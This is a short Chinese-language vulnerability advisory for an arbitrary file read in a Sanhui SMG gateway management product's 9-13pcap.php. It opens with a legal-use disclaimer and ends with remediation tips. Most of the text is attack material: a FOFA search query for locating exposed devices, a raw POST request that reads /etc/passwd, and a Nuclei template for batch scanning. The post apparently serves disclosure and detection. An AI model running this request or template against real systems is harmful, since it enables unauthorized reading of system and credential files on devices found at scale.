⚠️ 免责声明: 本文涉及的技术内容仅限用于合法的学习与研究目的。严禁利用文中提供的信息或工具进行任何形式的非法测试。任何因传播或使用相关内容而导致的直接或间接后果与损失,均由使用者自行承担全部责任,与本文作者无关。
🔍 漏洞概述
漏洞的核心在于 9-13pcap.php 文件对用户输入(如文件路径参数)的处理不当,未进行充分的验证和过滤。攻击者可读取系统任意文件内容。
🧪 FOFA 资产发现
body="text ml10 mr20" && (title="网关管理软件" || title="Gateway Management")
💉 漏洞复现
POST /en/9-13pcap.php HTTP/1.1Host: target.comContent-Type: application/x-www-form-urlencoded; charset=UTF-8down=1&downfile=/etc/passwd

🧬 Nuclei POC —— 一键批量检测
id: sanhuiSMG-9-13pcap_php-File-Readinfo:name: 三汇 SMG 网关管理软件 9-13pcap.php 任意文件读取漏洞author: SanqianSecseverity: highhttp:- raw:- |POST /en/9-13pcap.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0Content-Type: application/x-www-form-urlencodeddown=1&downfile=/etc/passwdmatchers-condition: andmatchers:- type: wordpart: bodywords:- 'root:x:'- type: statusstatus:- 200
🛡️ 修复建议
1. 权限最小化:运行 Web 服务的操作系统账户应仅拥有访问必要文件的最小权限,避免使用高权限账户(如 root、Administrator)。
2. 部署 WAF:在应用前端部署 Web 应用防火墙(WAF),配置规则以检测和拦截包含路径遍历特征的恶意请求
3. 更新与补丁:关注软件厂商(三汇)发布的安全公告,及时应用官方提供的安全补丁或升级到修复漏洞的版本。
夜雨聆风